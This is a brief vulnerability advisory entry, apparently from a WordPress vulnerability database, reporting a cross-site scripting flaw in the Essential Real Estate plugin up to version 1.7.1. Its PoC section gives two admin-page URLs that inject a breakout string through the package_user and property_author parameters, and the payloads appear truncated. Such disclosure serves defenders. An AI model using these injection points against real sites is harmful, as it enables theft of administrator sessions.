Essential Real Estate <= 1.7.1 - XSS

2019-07-04T00:00:00
ID WPVDB-ID:9421
Type wpvulndb
Reporter wpvulndb
Modified 2019-07-04T00:00:00

Description

WordPress Vulnerability - Essential Real Estate <= 1.7.1 - XSS

PoC

Example: https:///wp-admin/edit.php?post_status=all&post;_type=user_package&package;_user=">&filter;_action=Filter&paged;=1 https:///wp-admin/edit.php?post_status=all&post;_type=property&property;_author=">&property;_identity&filter;_action=Filter&paged;=1